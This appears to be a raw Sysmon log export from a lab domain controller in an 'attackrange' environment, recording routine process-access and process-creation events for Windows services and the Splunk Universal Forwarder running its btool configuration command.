10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E0B-5F80-4600-000000007F01}4076C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4500-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001771Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001770Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001769Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4500-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001768Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.152{733EE690-3E0B-5F80-4400-000000007F01}40364040C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{733EE690-3E0B-5F80-4500-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001767Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.154{733EE690-3E0B-5F80-4500-000000007F01}4056C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{733EE690-3E0B-5F80-4400-000000007F01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001766Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.151{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4400-000000007F01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001765Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0B-5F80-4400-000000007F01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3E0B-5F80-4300-000000007F01}40244028C:\Windows\system32\cmd.exe{733EE690-3E0B-5F80-4400-000000007F01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.149{733EE690-3E0B-5F80-4400-000000007F01}4036C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{733EE690-3E0B-5F80-4300-000000007F01}4024C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:11.135{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0B-5F80-4300-000000007F01}4024C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 